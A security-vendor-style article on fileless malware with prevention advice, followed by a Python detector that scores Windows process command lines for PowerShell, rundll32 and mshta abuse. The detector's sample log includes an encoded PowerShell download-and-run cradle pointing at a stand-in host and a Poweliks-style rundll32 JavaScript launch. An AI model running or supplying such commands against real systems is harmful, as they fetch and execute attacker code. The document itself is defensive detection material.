In any corporate cybersecurity awareness strategy, employees have one fundamental commandment: never open an attachment unless you are sure it is safe. Ignoring this rule, and downloading or opening the file, can trigger a security incident across the whole company.
But what happens when the malware flooding a computer isn't hidden inside a file at all, but is injected into a hard-to-detect process? This is exactly what companies face when they come up against fileless malware.
What is fileless malware?
Fileless malware is malware that does not reach the computer as a document or executable written to disk. Instead, it runs directly in the machine's RAM, typically by abusing legitimate processes and built-in tools that are already present on the system.
Once running, this technique can act on a computer in several ways: Anthrax affects the files on the system; Phasebot is sold as a configuration kit that other cybercriminals build their own malware on; and Poweliks keeps its payload in the Windows registry rather than on disk and uses that foothold to pull in further infections, to give but a few examples.
Because there is no file to scan, fileless malware is hard for the affected user to detect, and it also slips past security solutions that are not specifically designed to inspect what is running in memory.
35% of attacks in 2018
Despite being far less well known than other attacks, fileless malware is experiencing a boom that is starting to look worrying. According to a study from the Ponemon Institute, fileless techniques accounted for 29% of all cyberattacks worldwide in 2017, and the same study projected that the figure would reach 35% by the end of 2018.
This mode of attack is especially dangerous in the business environment. Because the malware lives in RAM, it survives only as long as the host stays up, so computers that are left on 24 hours a day give it the most time to act, and from there it can reach the servers the whole company depends on, provoking a chain reaction.
In any case, these attacks can affect any kind of organization. This is precisely what happened to the Democratic National Committee (DNC) in the US in mid-2016. The intrusion, whose leaks were fronted by the Guccifer 2.0 persona, relied on fileless components inside the DNC's systems and yielded 19,252 emails and 8,034 attachments. The outcome was the publication by WikiLeaks of a series of revelations that ended up hindering Hillary Clinton, Donald Trump's rival at the time.
How to avoid fileless malware
The relentless growth of this kind of cybercrime is forcing companies to take measures to avoid new infections. Some of the most vital steps are the following:
1.- Be cyber-resilient. The most obvious but also the most important tip: cybercrime repurposes and reinvents its strategies daily, so any company that wants to protect its corporate cybersecurity must be cyber-resilient and keep up to speed with new kinds of attack.
2.- Adapted solutions. The greatest advantage fileless malware has on its side is that, because it operates from RAM rather than from a file, it is invisible to solutions that only scan files on disk. Panda Adaptive Defense, by contrast, analyzes and monitors every suspicious process, whether it comes from a file on the endpoint or lives only in memory.
3.- Scripting languages. Fileless malware very often abuses tools that are already on the system and that invoke scripting languages, PowerShell above all. Where a machine does not need these interpreters, companies should disable or restrict them; where they are needed, keep only current versions, log what they execute and limit who is allowed to run them.
4.- Careful with macros. Macros are one of the most common tools on any office computer, but they are also a possible point of entry for this kind of attack, since a macro can launch a script interpreter without ever writing malware to disk. As with scripting languages, companies need not forgo macros altogether, but they do need to use them responsibly: block macros in documents received from outside the organization and allow only signed macros where they are genuinely needed.
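As an added example (not code from the original article or from Panda Security), the following Python script shows the kind of monitoring points 2 and 3 above call for: it scans process-creation log lines for the command-line traits of fileless tradecraft, decodes PowerShell's Base64 -EncodedCommand argument (UTF-16LE) so the hidden script can be inspected, and flags lines that cross a score threshold. The log lines, the indicator list and the weights are constructed for illustration and are not a vendor's detection rules; the example goes slightly beyond the article's PowerShell case by also covering rundll32 abused to run JavaScript (the Poweliks technique) and mshta.

```python
"""Flag command lines characteristic of fileless / living-off-the-land tradecraft.

Illustrative example: indicators, weights and sample log lines are assumptions,
not a product's rule set or real telemetry.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# (name, pattern, weight). Weights are an illustrative scoring assumption.
INDICATORS = [
    ("ps_encoded_command", re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("ps_hidden_window",   re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I), 2),
    ("ps_no_profile",      re.compile(r"\s-nop(?:rofile)?\b", re.I), 1),
    ("ps_bypass_policy",   re.compile(r"\s-e(?:xecutionpolicy|p)\s+bypass\b", re.I), 2),
    # download-and-run-in-memory: IEX combined with a WebClient download in either order
    ("ps_download_exec",   re.compile(r"\b(?:iex|invoke-expression)\b.*(?:downloadstring|downloadfile)"
                                      r"|(?:downloadstring|downloadfile).*\b(?:iex|invoke-expression)\b", re.I), 4),
    # rundll32 launching script code instead of a DLL export (Poweliks-style)
    ("rundll32_script",    re.compile(r"\brundll32(?:\.exe)?\b.*\b(?:javascript|vbscript):", re.I), 4),
    # mshta pulling a remote or inline script
    ("mshta_remote",       re.compile(r"\bmshta(?:\.exe)?\b.*(?:https?://|javascript:|vbscript:)", re.I), 4),
]
WEIGHTS = {name: weight for name, _, weight in INDICATORS}
ALERT_THRESHOLD = 3
ENCODED_ARG = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


@dataclass
class Finding:
    line_no: int
    score: int
    indicators: List[str]
    decoded: Optional[str]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmdline: str) -> Tuple[int, List[str], Optional[str]]:
    """Score a single command line; decoded PowerShell payloads are scanned too."""
    hits = [name for name, pat, _ in INDICATORS if pat.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits += ["decoded:" + name for name, pat, _ in INDICATORS if pat.search(decoded)]
    score = sum(WEIGHTS[h.split(":", 1)[-1]] for h in hits)
    return score, hits, decoded


def scan_log(text: str, threshold: int = ALERT_THRESHOLD) -> List[Finding]:
    """Parse lines of the form '<timestamp> <event_id> <command line>' and report hits."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        _ts, _event_id, cmdline = line.split(" ", 2)
        score, hits, decoded = score_command_line(cmdline)
        if score >= threshold:
            findings.append(Finding(n, score, hits, decoded))
    return findings


# Constructed sample log (not real telemetry). The encoded payload is built here so
# the Base64 matches exactly what PowerShell expects for -EncodedCommand.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
_ENC = base64.b64encode(_PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_LOG = "\n".join([
    "2018-06-01T08:12:03Z 4688 powershell.exe -nop -w hidden -enc " + _ENC,
    "2018-06-01T08:15:44Z 4688 powershell.exe -ExecutionPolicy RemoteSigned -File C:\\Scripts\\nightly-backup.ps1",
    "2018-06-01T08:20:10Z 4688 rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write(\"<stub>\")",
    "2018-06-01T08:21:02Z 4688 rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
])

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: score={f.score} indicators={f.indicators}")
        if f.decoded:
            print("  decoded payload:", f.decoded)
```

On a real Windows estate the input for such a scan comes from the Security log's process-creation event (ID 4688, with command-line auditing enabled in policy) or from PowerShell script block logging (ID 4104 in the Microsoft-Windows-PowerShell/Operational log), which records the decoded script directly; the signed backup script and the ordinary rundll32 control-panel call in the sample stay below the threshold, while the encoded downloader and the rundll32 JavaScript launch are reported.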